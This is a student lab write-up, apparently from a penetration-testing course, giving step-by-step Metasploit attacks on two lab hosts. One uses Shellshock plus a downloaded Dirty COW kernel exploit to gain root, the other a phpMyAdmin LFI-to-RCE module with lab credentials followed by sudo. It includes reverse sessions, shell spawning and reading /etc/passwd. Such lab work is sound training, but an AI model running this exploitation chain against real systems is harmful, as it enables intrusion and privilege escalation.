It's important to understand some of the technical underpinnings associated with system exploitation before employing automated tools to do the work for us. Relying on a tool without understanding what is going on and the ramifications of the tool's use is a recipe for disaster. The term "script-kiddie" describes this undesirable behavior. Metasploit is a sophisticated tool. It can greatly enhance the efficiency of a pen test. It can also be extended to deal with new exploits as they are discovered. Before launching an exploit, it is advisable to look at the metasploit exploit ruby module description and code. In many cases, they credit the work of someone who took the time to find the exploit by hand.

Honestly, this was so interesting to me because it's a little scary how simple it can be to get into a system this way. Metasploit is SO simple compared to hand-crafting exploits because people have already made the exploits for you, and in terms of learning I think this is a really powerful tool - but it could also be really dangerous. I think that uploading Exploit-DB exploits is a lot more powerful because that is updated so frequently and it's so easy just to do a google search to find them, but this is still really useful and powerful.

• Check to make sure the host Cupcake resolves with a ping 10.0.5.23
• Perform a port scan with sudo nmap -sS -vvv 10.0.5.23
• Now that we know port 22 and 80 are open, run another scan to check service version: nmap -sC -sV 10.0.5.23 -p 80,22
  • Apache version is 2.2.15 - take note of this for later.
• Run curl http://10.0.5.23 to see what's good on there, run a dirb http://10.0.5.23 to find any other urls. Looks like there is a /cgi-bin/status url.
• Now, search exploits for this specific Apache version. Looks like there is a RCE exploit here.
• Spin up Metasploit with sudo msfconsole
• Once Metasploit has started, enter use exploit/multi/http/apache_mod_cgi_bash_env_exec, and view the options available with options. This should also show some payload options that you can use with the exploit. You can also run show payloads to see more.

set RHOST 10.0.5.23
set TARGETURI /cgi-bin/status
set LHOST eth0
set LPORT 443

• Now run exploit to deploy the exploit! You should be met with a meterpreter prompt. Enter background and check your session with sessions -i
• Set the session with session -i 1. You can check the UID with getuid.
• Start a small shell with shell and spawn up the bash shell with python -c 'import pty; pty.spawn("/bin/bash")'
• You can now run stuff like cat /etc/passwd, and check the kernel verision with uname -a
  • Looks like the kernel is 2.6.32. Research some exploits for this kernel. (This one is what we will use)
• Once you have the exploit, download it to your LOCAL machine with cd Desktop and then a wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c /tmp/dirty.c
• Back on Cupcake, run ^C and upload the exploit with upload /home/<user>/Desktop/dirty.c
• Get back into the shell with shell and python -c 'import pty; pty.spawn("/bin/bash")'. Cd to /tmp/dirty.c.
• Now, run gcc dirty.c -o exploit -lcrypt -lpthread. There should now be a file called exploit in that working directory. Chagne the perms to execute with chmod +x exploit, and run with ./exploit. You should now be able to restart/re-enter the shell, and su firefart to get root perms! You can CD into the root directory assuming all went well.

• Check to make sure the host Nancurunir resolves with a ping 10.0.5.28
• Now run a SYN scan to see what ports are open: `sudo nmap -sS -vvv 10.0.5.28
  • Scan revealed that port 80 was open.
• Now we can look for services running on that port with nmap -sC -sV 10.0.5.28 -p 80
  • Check for service versions, in this case apache specifically. Not exploitable based on version. However, we exploited this target in the past and we know that it uses phpymyadmin which does have known exploits. For the sake of doing this lab fully, the exploits we'll do a dirb scan to find that URL.
• Running a curl http://10.0.5.28 dumps out the contents of the running webpage. Unfortunately, there's not a lot of useful info to gleam other than the password stuff that we did in the previous lab (See Lab 10.2 to get the password).
• Perform dirb http://10.0.5.28 to find the URL that we are going to exploit. This is luckily something we know exists beforehand, but it looks like phpmyadmin is installed on this endpoint, so we will look up exploits for that.
  • Returns a lot of pages, mostly related to phpmyadmin which we know can be exploited.
  • https://www.exploit-db.com/exploits/50457
  • https://www.rapid7.com/db/modules/exploit/multi/http/phpmyadmin_lfi_rce/

• Now that we know the exploit to use, run sudo msfconsole to start metasploit.
• Get our exploit going with use exploit/multi/http/phpmyadmin_lfi_rce. Run options to get a table of the variables we will use for the exploit. To set these variables:

set RHOST 10.0.5.28
set PASSWORD shallnotpass
set USERNAME gandalf
set LHOST eth0
set TARGETURI /phpmyadmin
* NOTE: metasploit sets this one by default

• To get a list of payloads to test and use for our exploit, run a show payloads.
• Start up the exploit with exploit, and background after. Get the session back with sessions -i 1.
• We can run a quick getuid to see the user that we are and the version of the service that is running.
• To start up a shell, simply run shell to spawn a quick little shell. To get a bash shell, run python3 -c 'import pty; pty.spawn("/bin/bash")'
• We're in! And we know the password for gandalf is gandalfthewhite so we can go ahead and elevate to that user.
• Since this user has root perms, it's as easy as running sudo su and entering galdalf's password again, and now we are the root user.